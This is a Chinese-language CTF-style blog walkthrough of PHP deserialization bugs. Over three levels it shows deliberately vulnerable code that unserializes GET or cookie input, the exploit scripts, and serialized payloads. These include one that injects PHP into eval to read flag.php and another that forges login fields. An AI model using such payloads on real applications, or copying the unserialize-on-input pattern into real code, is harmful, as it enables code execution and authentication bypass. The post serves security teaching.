PHP代码审计-反序列化漏洞

Last updated on July 8, 2025 pm

所有的 flag 均在 flag.php 的 $flag 变量中

level 1

1
2
3
4
5
6
7
8
9
10
11
<?php
highlight_file(__FILE__);
class a{
    var $act;
    function action(){
        eval($this->act);
    }
}
$a=unserialize($_GET['flag']);
$a->action();
?>

eval函数为代码执行函数,将字符串作为php代码执行,已知 flag 在 flag.php 文件中,先将 flag.php 文件包含进来,再对 flag 变量进行输出

exp:

1
2
3
4
5
6
7
8
9
10
11
<?php
highlight_file(__FILE__);
class a{
    var $act;
    function action(){
        eval($this->act);
    }
}
$test = new a;
$test->act = 'include("flag.php");echo $flag;';
echo serialize($test)

生成的payload:

O:1:”a”:1:{s:3:”act”;s:31:”include(“flag.php”);echo $flag;”;}

level 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=unserialize($_GET['param']);
if($a->login())
{
    echo $flag;
}
?>

login 方法中校验 user 和 pass 的值,如果返回结果为真,则输出 $flag

__construct 初始化方法

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$test = new mylogin("daydream","ok");

echo serialize($test);
?>

payload:

O:7:”mylogin”:2:{s:4:”user”;s:8:”daydream”;s:4:”pass”;s:2:”ok”;}

level 3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=unserialize($_COOKIE['param']);
if($a->login())
{
    echo $flag;
}
?>

与 level 2 相似 注意 超全局变量 $_COOKIE ,通过cookie 传参传入 payload ,同时进行一下url编码

payload:

O%3a7%3a%22mylogin%22%3a2%3a%7bs%3a4%3a%22user%22%3bs%3a8%3a%22daydream%22%3bs%3a4%3a%22pass%22%3bs%3a2%3a%22ok%22%3b%7d

未完待续。。。

网络安全
#代码审计 #php #反序列化
PHP代码审计-反序列化漏洞
https://blog.lixey.top/posts/bcdf8f30/
Author
Lixiney
Posted on
July 8, 2025
Licensed under